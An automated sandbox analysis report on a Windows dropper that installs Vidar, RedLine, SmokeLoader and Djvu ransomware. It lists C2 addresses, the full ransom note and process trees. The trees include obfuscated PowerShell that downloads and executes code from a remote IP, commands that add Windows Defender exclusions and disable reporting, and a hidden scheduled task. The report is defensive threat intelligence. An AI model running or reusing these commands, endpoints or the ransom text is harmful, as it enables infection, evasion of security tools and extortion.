Analysis

  • max time kernel
    46s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-03-2022 18:45

General

  • Target

    81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe

  • Size

    4.2MB

  • MD5

    46d5bc56132505832d81688f7ac1983a

  • SHA1

    68944f0bcddefdba4c5e5243c8168cf044aba6c0

  • SHA256

    81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426

  • SHA512

    d4345cfbed80ddf62ac493a92c1b6beaf3b3fa61cf50a5bd89df314ece24413a831ee6450f5503380754ffe339f1cc7be4882adf44534cd24b976b0091b09f25

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Ani

C2

detuyaluro.xyz:80

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 35 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe
    "C:\Users\Admin\AppData\Local\Temp\81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4132
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3864
      • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_10.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_10.exe
            sonia_10.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:5024
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_8.exe
            sonia_8.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_5.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3936
          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_5.exe
            sonia_5.exe
            5⤵
            • Executes dropped EXE
            PID:5104
            • C:\Users\Admin\AppData\Local\Temp\is-HCM3J.tmp\sonia_5.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-HCM3J.tmp\sonia_5.tmp" /SL5="$601D2,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_5.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_4.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_3.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1876
          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_3.exe
            sonia_3.exe
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:4948
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1064
              6⤵
              • Program crash
              PID:1312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_2.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.exe
            sonia_1.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:840
            • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.exe" -a
              6⤵
              • Executes dropped EXE
              PID:3904
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 580
          4⤵
          • Program crash
          PID:4384
  • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_9.exe
    sonia_9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:2300
    • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_9.exe
      C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_9.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3404
  • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_7.exe
    sonia_7.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    PID:5052
    • C:\Users\Admin\Documents\LJiiP3DN6VVpR0PbjEbnosFA.exe
      "C:\Users\Admin\Documents\LJiiP3DN6VVpR0PbjEbnosFA.exe"
      2⤵
      • Executes dropped EXE
      PID:2744
    • C:\Users\Admin\Documents\9wEJyzAOuFaVlBCSiMboQisU.exe
      "C:\Users\Admin\Documents\9wEJyzAOuFaVlBCSiMboQisU.exe"
      2⤵
        PID:4452
        • C:\Users\Admin\Documents\9wEJyzAOuFaVlBCSiMboQisU.exe
          "C:\Users\Admin\Documents\9wEJyzAOuFaVlBCSiMboQisU.exe"
          3⤵
            PID:4384
        • C:\Users\Admin\Documents\XCdJQC9CdkftuW1pQh72Amhi.exe
          "C:\Users\Admin\Documents\XCdJQC9CdkftuW1pQh72Amhi.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1716
          • C:\Users\Admin\AppData\Local\Temp\58732b3f-9d45-4d6e-a549-ae364f5402a3.exe
            "C:\Users\Admin\AppData\Local\Temp\58732b3f-9d45-4d6e-a549-ae364f5402a3.exe"
            3⤵
              PID:4840
          • C:\Users\Admin\Documents\sdm6fEtu3hHYecyoYgrZ6xem.exe
            "C:\Users\Admin\Documents\sdm6fEtu3hHYecyoYgrZ6xem.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:2528
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sjMUWj5swb.bat"
              3⤵
                PID:6004
                • C:\Windows\SysWOW64\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  4⤵
                    PID:3748
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      5⤵
                        PID:4320
                    • C:\Users\Admin\Documents\AssertDebug\9wEJyzAOuFaVlBCSiMboQisU.exe
                      "C:\Users\Admin\Documents\AssertDebug\9wEJyzAOuFaVlBCSiMboQisU.exe"
                      4⤵
                        PID:3912
                  • C:\Users\Admin\Documents\voK2O5UdURJKSiao6Xpa2wEa.exe
                    "C:\Users\Admin\Documents\voK2O5UdURJKSiao6Xpa2wEa.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:3864
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                      3⤵
                        PID:5380
                        • C:\Windows\system32\mode.com
                          mode 65,10
                          4⤵
                            PID:5276
                          • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                            7z.exe e file.zip -p320791618516055 -oextracted
                            4⤵
                              PID:5352
                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                              7z.exe e extracted/file_9.zip -oextracted
                              4⤵
                                PID:5676
                          • C:\Users\Admin\Documents\swEp9JqkV_I2zF6oLnNnwvHw.exe
                            "C:\Users\Admin\Documents\swEp9JqkV_I2zF6oLnNnwvHw.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4356
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                              3⤵
                                PID:5180
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1016
                                3⤵
                                • Program crash
                                PID:1480
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                3⤵
                                  PID:1836
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1072
                                  3⤵
                                  • Program crash
                                  PID:5164
                              • C:\Users\Admin\Documents\GNFd5YzrfmQYb37_KqMQnhZ6.exe
                                "C:\Users\Admin\Documents\GNFd5YzrfmQYb37_KqMQnhZ6.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:544
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 432
                                  3⤵
                                  • Program crash
                                  PID:4008
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 440
                                  3⤵
                                  • Program crash
                                  PID:5160
                              • C:\Users\Admin\Documents\ENyB96mdAUxc3vj6jyOm0o1p.exe
                                "C:\Users\Admin\Documents\ENyB96mdAUxc3vj6jyOm0o1p.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:1312
                              • C:\Users\Admin\Documents\G7OGCLTO2fJPmEFPCM27tino.exe
                                "C:\Users\Admin\Documents\G7OGCLTO2fJPmEFPCM27tino.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1300
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 444
                                  3⤵
                                  • Program crash
                                  PID:3868
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 452
                                  3⤵
                                  • Executes dropped EXE
                                  • Program crash
                                  PID:4452
                              • C:\Users\Admin\Documents\nHzgppfXWHh4gsu8NX8VBuUL.exe
                                "C:\Users\Admin\Documents\nHzgppfXWHh4gsu8NX8VBuUL.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1204
                                • C:\Users\Admin\AppData\Local\Temp\7zS41F.tmp\Install.exe
                                  .\Install.exe
                                  3⤵
                                    PID:4500
                                    • C:\Users\Admin\AppData\Local\Temp\7zS234F.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      4⤵
                                        PID:5100
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                          5⤵
                                            PID:5896
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                              6⤵
                                                PID:5716
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                  7⤵
                                                    PID:4428
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                    7⤵
                                                      PID:6076
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                  5⤵
                                                    PID:5720
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                      6⤵
                                                        PID:5972
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                          7⤵
                                                            PID:4536
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                            7⤵
                                                              PID:5560
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "gmCPOYPQm" /SC once /ST 00:12:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                          5⤵
                                                          • Creates scheduled task(s)
                                                          PID:4592
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /run /I /tn "gmCPOYPQm"
                                                          5⤵
                                                            PID:2292
                                                    • C:\Users\Admin\Documents\pVdoU1LY9DBfWg76VKVm33Ez.exe
                                                      "C:\Users\Admin\Documents\pVdoU1LY9DBfWg76VKVm33Ez.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:5064
                                                    • C:\Users\Admin\Documents\jMe6RHL1Xe6qEJf6Bifh0LoY.exe
                                                      "C:\Users\Admin\Documents\jMe6RHL1Xe6qEJf6Bifh0LoY.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:5068
                                                    • C:\Users\Admin\Documents\X4O6Sx_4S_ZxaYbD4WPes1D0.exe
                                                      "C:\Users\Admin\Documents\X4O6Sx_4S_ZxaYbD4WPes1D0.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2980
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                        3⤵
                                                          PID:1776
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                          3⤵
                                                            PID:3460
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              "C:\Windows\System32\svchost.exe"
                                                              4⤵
                                                                PID:4600
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 456
                                                                  5⤵
                                                                  • Program crash
                                                                  PID:5644
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                              3⤵
                                                                PID:1924
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                3⤵
                                                                  PID:2720
                                                              • C:\Users\Admin\Documents\Whv7t9F1w9Ya7hQha6T1rEFt.exe
                                                                "C:\Users\Admin\Documents\Whv7t9F1w9Ya7hQha6T1rEFt.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:1864
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 624
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:3984
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 656
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5152
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 748
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:3496
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 816
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:440
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 1244
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5824
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 1252
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:1260
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 1276
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:1212
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 1256
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5520
                                                              • C:\Users\Admin\Documents\BtyJuzupEoos7Ed0IY3J8PNg.exe
                                                                "C:\Users\Admin\Documents\BtyJuzupEoos7Ed0IY3J8PNg.exe"
                                                                2⤵
                                                                  PID:2800
                                                                • C:\Users\Admin\Documents\p2xfyK1hUYzVC2kGjIXUzbRw.exe
                                                                  "C:\Users\Admin\Documents\p2xfyK1hUYzVC2kGjIXUzbRw.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:364
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                    3⤵
                                                                      PID:2936
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd
                                                                        4⤵
                                                                          PID:5092
                                                                    • C:\Users\Admin\Documents\p55zbEgFNik8EH5NXAmDMKcq.exe
                                                                      "C:\Users\Admin\Documents\p55zbEgFNik8EH5NXAmDMKcq.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:3216
                                                                    • C:\Users\Admin\Documents\qdO4FQjsLFOKOA3YD61vJPTW.exe
                                                                      "C:\Users\Admin\Documents\qdO4FQjsLFOKOA3YD61vJPTW.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:3440
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im qdO4FQjsLFOKOA3YD61vJPTW.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\qdO4FQjsLFOKOA3YD61vJPTW.exe" & del C:\ProgramData\*.dll & exit
                                                                        3⤵
                                                                          PID:5984
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im qdO4FQjsLFOKOA3YD61vJPTW.exe /f
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            PID:2212
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 6
                                                                            4⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:5464
                                                                      • C:\Users\Admin\Documents\06kWB4m9ah3aiDe3l90FsCgW.exe
                                                                        "C:\Users\Admin\Documents\06kWB4m9ah3aiDe3l90FsCgW.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4788
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 432
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:4020
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 452
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:5144
                                                                      • C:\Users\Admin\Documents\McnbXc8q7q3Z6o5JlfCoJ2Rm.exe
                                                                        "C:\Users\Admin\Documents\McnbXc8q7q3Z6o5JlfCoJ2Rm.exe"
                                                                        2⤵
                                                                          PID:1060
